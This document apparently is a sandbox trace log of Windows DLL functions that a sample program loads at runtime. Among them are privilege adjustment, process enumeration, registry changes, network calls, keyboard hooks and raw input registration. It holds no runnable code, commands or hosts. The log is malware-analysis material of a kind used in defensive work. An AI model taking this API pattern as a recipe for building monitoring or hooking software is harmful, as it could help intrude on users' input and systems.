DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: kernel32.dll/LCMapStringEx
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcessIdW
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
DynamicLoader: kernel32.dll/ResolveLocaleName
DynamicLoader: kernel32.dll/CompareStringOrdinal
DynamicLoader: kernel32.dll/GetFullPathName
DynamicLoader: kernel32.dll/GetFullPathNameW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/OpenProcessW
DynamicLoader: psapi.dll/EnumProcessModules
DynamicLoader: psapi.dll/EnumProcessModulesW
DynamicLoader: kernel32.dll/GetExitCodeProcessW
DynamicLoader: USER32.dll/EnumWindows
DynamicLoader: USER32.dll/EnumWindowsW
DynamicLoader: USER32.dll/IsWindowVisibleW
DynamicLoader: ntdll.dll/NtQuerySystemInformationW
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: shell32.dll/SHGetFolderPath
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguagesW
DynamicLoader: shell32.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/GetUserDefaultLocaleName
DynamicLoader: kernel32.dll/GetUserDefaultLocaleNameW
DynamicLoader: kernel32.dll/GetEnvironmentVariable
DynamicLoader: kernel32.dll/GetEnvironmentVariableW
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetFileType
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: wintrust.dll/WTGetSignatureInfo
DynamicLoader: wintrust.dll/WTGetSignatureInfoA
DynamicLoader: wintrust.dll/_WTGetSignatureInfo@24
DynamicLoader: ADVAPI32.dll/RegQueryInfoKey
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyEx
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegEnumValue
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: wintrust.dll/WinVerifyTrust
DynamicLoader: wintrust.dll/WinVerifyTrustW
DynamicLoader: wintrust.dll/WintrustCertificateTrust
DynamicLoader: wintrust.dll/SoftpubAuthenticode
DynamicLoader: wintrust.dll/SoftpubInitialize
DynamicLoader: wintrust.dll/SoftpubLoadMessage
DynamicLoader: wintrust.dll/SoftpubLoadSignature
DynamicLoader: MSISIP.DLL/DllCanUnloadNow
DynamicLoader: MSISIP.DLL/MsiSIPIsMyTypeOfFile
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/StgOpenStorage
DynamicLoader: wshext.dll/DllCanUnloadNow
DynamicLoader: wshext.dll/IsFileSupportedName
DynamicLoader: pwrshsip.dll/DllCanUnloadNow
DynamicLoader: pwrshsip.dll/PsIsMyFileType
DynamicLoader: pwrshsip.dll/PsPutSignature
DynamicLoader: pwrshsip.dll/PsGetSignature
DynamicLoader: wintrust.dll/WTHelperProvDataFromStateData
DynamicLoader: wintrust.dll/WTHelperProvDataFromStateDataW
DynamicLoader: wintrust.dll/WTHelperGetProvSignerFromChain
DynamicLoader: wintrust.dll/WTHelperGetProvSignerFromChainW
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetCurrentConsoleFontEx
DynamicLoader: kernel32.dll/GetCurrentConsoleFontExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: kernel32.dll/GetTimeZoneInformation
DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
DynamicLoader: shell32.dll/SHGetFolderPathW
DynamicLoader: bcrypt.dll/BCryptGetFipsAlgorithmMode
DynamicLoader: CRYPTSP.dll/CryptGetDefaultProviderW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: kernel32.dll/GetComputerName
DynamicLoader: kernel32.dll/GetComputerNameW
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfo
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfoW
DynamicLoader: kernel32.dll/GetConsoleMode
DynamicLoader: kernel32.dll/GetConsoleModeW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/GetCurrentProcessW
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetTokenInformationW
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/LocalAllocW
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/DuplicateTokenExW
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: ADVAPI32.dll/CheckTokenMembershipW
DynamicLoader: kernel32.dll/GetConsoleTitle
DynamicLoader: kernel32.dll/GetConsoleTitleW
DynamicLoader: kernel32.dll/SetConsoleMode
DynamicLoader: kernel32.dll/SetConsoleModeW
DynamicLoader: kernel32.dll/SetConsoleTitle
DynamicLoader: kernel32.dll/SetConsoleTitleW
DynamicLoader: kernel32.dll/SetConsoleCtrlHandler
DynamicLoader: kernel32.dll/SetConsoleCtrlHandlerW
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/GetConsoleMode
DynamicLoader: kernel32.dll/GetProcessTimes
DynamicLoader: kernel32.dll/GetProcessTimesW
DynamicLoader: kernel32.dll/GetDynamicTimeZoneInformation
DynamicLoader: kernel32.dll/GetFileMUIPath
DynamicLoader: kernel32.dll/LoadLibraryEx
DynamicLoader: kernel32.dll/LoadLibraryExW
DynamicLoader: kernel32.dll/FreeLibrary
DynamicLoader: kernel32.dll/FreeLibraryW
DynamicLoader: USER32.dll/LoadStringW
DynamicLoader: ADVAPI32.dll/CreateWellKnownSid
DynamicLoader: kernel32.dll/CreateNamedPipe
DynamicLoader: kernel32.dll/CreateNamedPipeW
DynamicLoader: kernel32.dll/GetFileType
DynamicLoader: kernel32.dll/CreateEvent
DynamicLoader: kernel32.dll/CreateEventW
DynamicLoader: kernel32.dll/ConnectNamedPipe
DynamicLoader: kernel32.dll/SetEnvironmentVariable
DynamicLoader: kernel32.dll/SetEnvironmentVariableW
DynamicLoader: mscoree.dll/GetTokenForVTableEntry
DynamicLoader: mscoree.dll/SetTargetForVTableEntry
DynamicLoader: mscoree.dll/GetTargetForVTableEntry
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: api-ms-win-core-xstate-l2-1-0.dll/GetEnabledXStateFeatures
DynamicLoader: clrjit.dll/sxsJitStartup
DynamicLoader: clrjit.dll/jitStartup
DynamicLoader: clrjit.dll/getJit
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: kernel32.dll/ExpandEnvironmentStrings
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: secur32.dll/GetUserNameEx
DynamicLoader: secur32.dll/GetUserNameExW
DynamicLoader: ADVAPI32.dll/GetUserName
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: kernel32.dll/EnumCalendarInfoExEx
DynamicLoader: kernel32.dll/GetCalendarInfoEx
DynamicLoader: kernel32.dll/EnumSystemLocalesEx
DynamicLoader: kernel32.dll/EnumTimeFormatsEx
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: ADVAPI32.dll/RegisterEventSource
DynamicLoader: ADVAPI32.dll/RegisterEventSourceW
DynamicLoader: ADVAPI32.dll/DeregisterEventSource
DynamicLoader: ADVAPI32.dll/ReportEvent
DynamicLoader: ADVAPI32.dll/ReportEventW
DynamicLoader: kernel32.dll/GetLogicalDrives
DynamicLoader: kernel32.dll/GetDriveType
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetVolumeInformation
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: SHLWAPI.dll/PathIsNetworkPath
DynamicLoader: SHLWAPI.dll/PathIsNetworkPathW
DynamicLoader: shell32.dll/
DynamicLoader: kernel32.dll/GetFileAttributes
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/GetCurrentDirectoryW
DynamicLoader: kernel32.dll/GetSystemDirectory
DynamicLoader: kernel32.dll/GetSystemDirectoryW
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: kernel32.dll/GetTempPath
DynamicLoader: kernel32.dll/GetTempPathW
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: ADVAPI32.dll/SaferIdentifyLevel
DynamicLoader: ADVAPI32.dll/SaferComputeTokenFromLevel
DynamicLoader: ADVAPI32.dll/SaferCloseLevel
DynamicLoader: kernel32.dll/DeleteFile
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/GetSystemInfo
DynamicLoader: kernel32.dll/QueryPerformanceFrequency
DynamicLoader: kernel32.dll/QueryPerformanceCounter
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: uxtheme.dll/ThemeInitApiHook
DynamicLoader: USER32.dll/IsProcessDPIAware
DynamicLoader: ole32.dll/CoWaitForMultipleHandles
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: ole32.dll/NdrOleInitializeExtension
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/SetThreadUILanguageW
DynamicLoader: kernel32.dll/CreateDirectory
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/GetModuleFileName
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesEx
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/FindFirstFile
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/FindNextFile
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/GetACP
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/StgOpenStorage
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/StgOpenStorage
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/StgOpenStorage
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: rasapi32.dll/RasEnumConnections
DynamicLoader: rasapi32.dll/RasEnumConnectionsW
DynamicLoader: rtutils.dll/TraceRegisterExA
DynamicLoader: rtutils.dll/TracePrintfExA
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/QueryServiceStatus
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: WS2_32.dll/WSAStartup
DynamicLoader: WS2_32.dll/WSASocket
DynamicLoader: WS2_32.dll/WSASocketW
DynamicLoader: WS2_32.dll/setsockopt
DynamicLoader: WS2_32.dll/WSAEventSelect
DynamicLoader: WS2_32.dll/ioctlsocket
DynamicLoader: WS2_32.dll/closesocket
DynamicLoader: WS2_32.dll/ioctlsocket
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: kernel32.dll/FormatMessage
DynamicLoader: kernel32.dll/FormatMessageW
DynamicLoader: WS2_32.dll/WSAEventSelect
DynamicLoader: rasapi32.dll/RasConnectionNotification
DynamicLoader: rasapi32.dll/RasConnectionNotificationW
DynamicLoader: ADVAPI32.dll/RegOpenCurrentUser
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegNotifyChangeKeyValue
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: winhttp.dll/WinHttpOpen
DynamicLoader: winhttp.dll/WinHttpOpenW
DynamicLoader: winhttp.dll/WinHttpCloseHandle
DynamicLoader: winhttp.dll/WinHttpCloseHandleW
DynamicLoader: winhttp.dll/WinHttpSetTimeouts
DynamicLoader: winhttp.dll/WinHttpSetTimeoutsW
DynamicLoader: winhttp.dll/WinHttpGetIEProxyConfigForCurrentUser
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: NSI.dll/NsiAllocateAndGetTable
DynamicLoader: CFGMGR32.dll/CM_Open_Class_Key_ExW
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: NSI.dll/NsiFreeTable
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: winhttp.dll/WinHttpGetProxyForUrl
DynamicLoader: winhttp.dll/WinHttpGetProxyForUrlW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: IPHLPAPI.DLL/GetNetworkParams
DynamicLoader: DNSAPI.dll/DnsQueryConfig
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: IPHLPAPI.DLL/GetIpInterfaceEntry
DynamicLoader: IPHLPAPI.DLL/GetBestInterfaceEx
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: WS2_32.dll/GetAddrInfoW
DynamicLoader: WS2_32.dll/freeaddrinfo
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: WS2_32.dll/WSAConnect
DynamicLoader: kernel32.dll/CancelIoEx
DynamicLoader: diasymreader.dll/DllGetClassObject
DynamicLoader: diasymreader.dll/DllGetClassObject
DynamicLoader: diasymreader.dll/DllGetClassObject
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/StgOpenStorage
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: shell32.dll/ShellExecuteEx
DynamicLoader: shell32.dll/ShellExecuteExW
DynamicLoader: ole32.dll/OleInitialize
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: PROPSYS.dll/PSCreateMemoryPropertyStore
DynamicLoader: PROPSYS.dll/PSPropertyBag_WriteDWORD
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: PROPSYS.dll/PSPropertyBag_ReadDWORD
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/OleUninitialize
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: kernel32.dll/FormatMessage
DynamicLoader: kernel32.dll/FormatMessageW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: mscoree.dll/CorExitProcess
DynamicLoader: mscoreei.dll/CorExitProcess_RetAddr
DynamicLoader: mscoreei.dll/CorExitProcess
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CLSIDFromOle1Class
DynamicLoader: CLBCatQ.DLL/GetCatalogObject
DynamicLoader: CLBCatQ.DLL/GetCatalogObject2
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: uxtheme.dll/ThemeInitApiHook
DynamicLoader: USER32.dll/IsProcessDPIAware
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: wininet.dll/DllGetClassObject
DynamicLoader: wininet.dll/DllCanUnloadNow
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: wininet.dll/DllGetClassObject
DynamicLoader: wininet.dll/DllCanUnloadNow
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoImpersonateClient
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoRevertToSelf
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetTokenInformation
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/CopySid
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EqualSid
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetSidSubAuthorityCount
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetSidSubAuthority
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventRegister
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventUnregister
DynamicLoader: Secur32.dll/GetUserNameExA
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCreateKeyExA
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegQueryValueExA
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegOpenKeyExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegGetValueW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCloseKey
DynamicLoader: SHELL32.dll/SHGetKnownFolderPath
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertSidToStringSidW
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemFree
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegGetValueA
DynamicLoader: iertutil.dll/
DynamicLoader: iertutil.dll/
DynamicLoader: iertutil.dll/
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegOpenKeyExA
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemAlloc
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: winhttp.dll/WinHttpCreateProxyResolver
DynamicLoader: iertutil.dll/
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegQueryValueExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCreateKeyExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegSetValueExW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: IPHLPAPI.DLL/NotifyIpInterfaceChange
DynamicLoader: IPHLPAPI.DLL/NotifyUnicastIpAddressChange
DynamicLoader: IPHLPAPI.DLL/GetBestInterfaceEx
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoInitializeSecurity
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: pcasvc.dll/ServiceMain
DynamicLoader: pcasvc.dll/SvchostPushServiceGlobals
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: api-ms-win-core-synch-l1-2-0.dll/InitializeConditionVariable
DynamicLoader: api-ms-win-core-synch-l1-2-0.dll/SleepConditionVariableCS
DynamicLoader: api-ms-win-core-synch-l1-2-0.dll/WakeAllConditionVariable
DynamicLoader: kernel32.dll/CreateHardLinkW
DynamicLoader: kernel32.dll/CreateSymbolicLinkW
DynamicLoader: ADVAPI32.dll/EventSetInformation
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ADVAPI32.dll/EventSetInformation
DynamicLoader: ADVAPI32.dll/EventSetInformation
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: msi.dll/
DynamicLoader: msi.dll/
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: msi.dll/
DynamicLoader: USER32.dll/GetKeyboardLayoutList
DynamicLoader: ADVAPI32.dll/EventSetInformation
DynamicLoader: SHELL32.dll/SHGetFolderPathW
DynamicLoader: USER32.dll/RegisterWindowMessageW
DynamicLoader: Secur32.dll/GetUserNameExW
DynamicLoader: USER32.dll/RegisterWindowMessageA
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: kernel32.dll/GetModuleHandleExW
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: SHELL32.dll/CommandLineToArgvW
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: USER32.dll/RegisterClassExW
DynamicLoader: IMM32.DLL/ImmDisableIME
DynamicLoader: USER32.dll/CreateWindowExW
DynamicLoader: uxtheme.dll/ThemeInitApiHook
DynamicLoader: RPCRT4.dll/RpcServerRegisterIf3
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: Normaliz.dll/IdnToAscii
DynamicLoader: urlmon.dll/CoInternetCreateSecurityManager
DynamicLoader: Secur32.dll/GetUserNameExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetTokenInformation
DynamicLoader: Secur32.dll/GetUserNameExA
DynamicLoader: Secur32.dll/InitSecurityInterfaceW
DynamicLoader: CRYPTSP.dll/SystemFunction035
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetSidSubAuthorityCount
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetSidSubAuthority
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCreateKeyExA
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegQueryValueExA
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegOpenKeyExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegGetValueW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCloseKey
DynamicLoader: SHELL32.dll/SHGetKnownFolderPath
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/CopySid
DynamicLoader: USER32.dll/IsProcessDPIAware
DynamicLoader: USER32.dll/DefWindowProcW
DynamicLoader: dwmapi.dll/DwmIsCompositionEnabled
DynamicLoader: USER32.dll/RegisterRawInputDevices
DynamicLoader: USER32.dll/SetTimer
DynamicLoader: USER32.dll/SetWindowLongW
DynamicLoader: USER32.dll/SetWindowsHookExW
DynamicLoader: USER32.dll/MsgWaitForMultipleObjects
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertSidToStringSidW
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemFree
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventRegister
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegGetValueA
DynamicLoader: iertutil.dll/
DynamicLoader: iertutil.dll/
DynamicLoader: iertutil.dll/
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegOpenKeyExA
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemAlloc
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: winhttp.dll/WinHttpCreateProxyResolver
DynamicLoader: iertutil.dll/
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegQueryValueExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventActivityIdControl
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCreateKeyExW
DynamicLoader: IPHLPAPI.DLL/GetBestInterfaceEx
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: api-ms-win-downlevel-shlwapi-l2-1-0.dll/SHGetValueA
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegSetValueExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegDeleteValueW
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
